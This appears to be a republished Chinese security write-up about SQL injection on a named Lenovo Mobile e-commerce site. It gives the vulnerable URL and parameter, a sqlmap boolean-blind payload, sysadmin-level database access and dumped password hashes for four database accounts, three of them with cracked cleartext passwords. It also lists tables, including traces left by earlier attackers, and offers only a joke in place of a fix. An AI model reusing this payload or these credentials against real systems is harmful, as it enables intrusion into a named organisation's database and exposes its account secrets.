联想移动电子商务系统SA注射及修复 - 网站安全

1.这个站点啦，联想移动电子商务系统哦，貌似和牛B的样子： http://ec.lenovomobile.com/ 2.这里可以注射： http://ec.lenovomobile.com/WebForm/Other/Other_download/Other_DownLoad_ListInfo.aspx?List_Name=联想移动合作银行 www.2cto.com 3.SA跑的呢： 4.可以跨多个库哦： 5.多个数据库账户的弱口令： sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: List_Name Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: List_Name=联想移动合作银行' AND 6011=6011 AND 'HHoo'='HHoo --- database management system users password hashes: [*] sa [1]: password hash: 0x0100b067524976ec63baa2ca005f95c57ee92c62e5dc0d2a27072c2812de9a617e1108f39c388b5252c274bebe9e header: 0x0100 salt: b0675249 mixedcase: 76ec63baa2ca005f95c57ee92c62e5dc0d2a2707 uppercase: 2c2812de9a617e1108f39c388b5252c274bebe9e [*] shenjx [1]: password hash: 0x01003e74822ba8b269e35e354d5c51ae092ac3fa75a7b1dba093a8b269e35e354d5c51ae092ac3fa75a7b1dba093 header: 0x0100 salt: 3e74822b mixedcase: a8b269e35e354d5c51ae092ac3fa75a7b1dba093 uppercase: a8b269e35e354d5c51ae092ac3fa75a7b1dba093 clear-text password: 654321 [*] swwl [1]: password hash: 0x0100b575e507b98bcb343331377b5ba7a26a09e83a51821c2f96fa0950ee393ffbb1980d997bce436645398f0219 header: 0x0100 salt: b575e507 mixedcase: b98bcb343331377b5ba7a26a09e83a51821c2f96 uppercase: fa0950ee393ffbb1980d997bce436645398f0219 clear-text password: swwl [*] wends [1]: password hash: 0x01001a76751df147fd28495401d6f84e98be0ba48bb05226b4e1e046486691b981689f41de885727f169f0850578 header: 0x0100 salt: 1a76751d mixedcase: f147fd28495401d6f84e98be0ba48bb05226b4e1 uppercase: e046486691b981689f41de885727f169f0850578 clear-text password: wends 6.看下当前库【LMECOTHER】的表信息，在此之前已经有人来过了，留下了D99和pangolin的临时表哎： Database: LMECOTHER [38 tables] +--------------------------------------------------+ | dbo.D99_CMD | | dbo.D99_Tmp | | dbo.Other_Address_List | | dbo.Other_Address_Org | | dbo.Other_BBS_Forum | | dbo.Other_BBS_ForumGroups | | dbo.Other_BBS_Posts | | dbo.Other_BBS_RePosts | | dbo.Other_BBS_Users | | dbo.Other_ClickStat | | dbo.Other_CusLine | | dbo.Other_CusLine_Type | | dbo.Other_DownLoad_KnowLedge_Type | | dbo.Other_DownLoad_List | | dbo.Other_DownLoad_List_Type | | dbo.Other_DownLoad_Pic | | dbo.Other_DownLoad_Tools | | dbo.Other_DownLoad_knowledge | | dbo.Other_Link | | dbo.Other_Rule | | dbo.Other_Survey | | dbo.Other_Survey_Item | | dbo.Other_Survey_Result | | dbo.View_Forum | | dbo.View_PostList | | dbo.dtproperties | | dbo.kill_kk | | dbo.other_CustMailInfo | | dbo.other_CustMailView | | dbo.other_Notice | | dbo.other_Notice_New | | dbo.other_Notification | | dbo.other_NotificationObj | | dbo.other_NotificationObj_New | | dbo.other_Notification_New | | dbo.pangolin_test_table | | dbo.sysconstraints | | dbo.syssegments | +--------------------------------------------------+ 修复方案：发礼物吧，还能怎么办！版权声明：转载请注明来源风萧萧

查看更多关于联想移动电子商务系统SA注射及修复 - 网站安全的详细内容...

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did13654

更新时间：2022-09-13 阅读：43次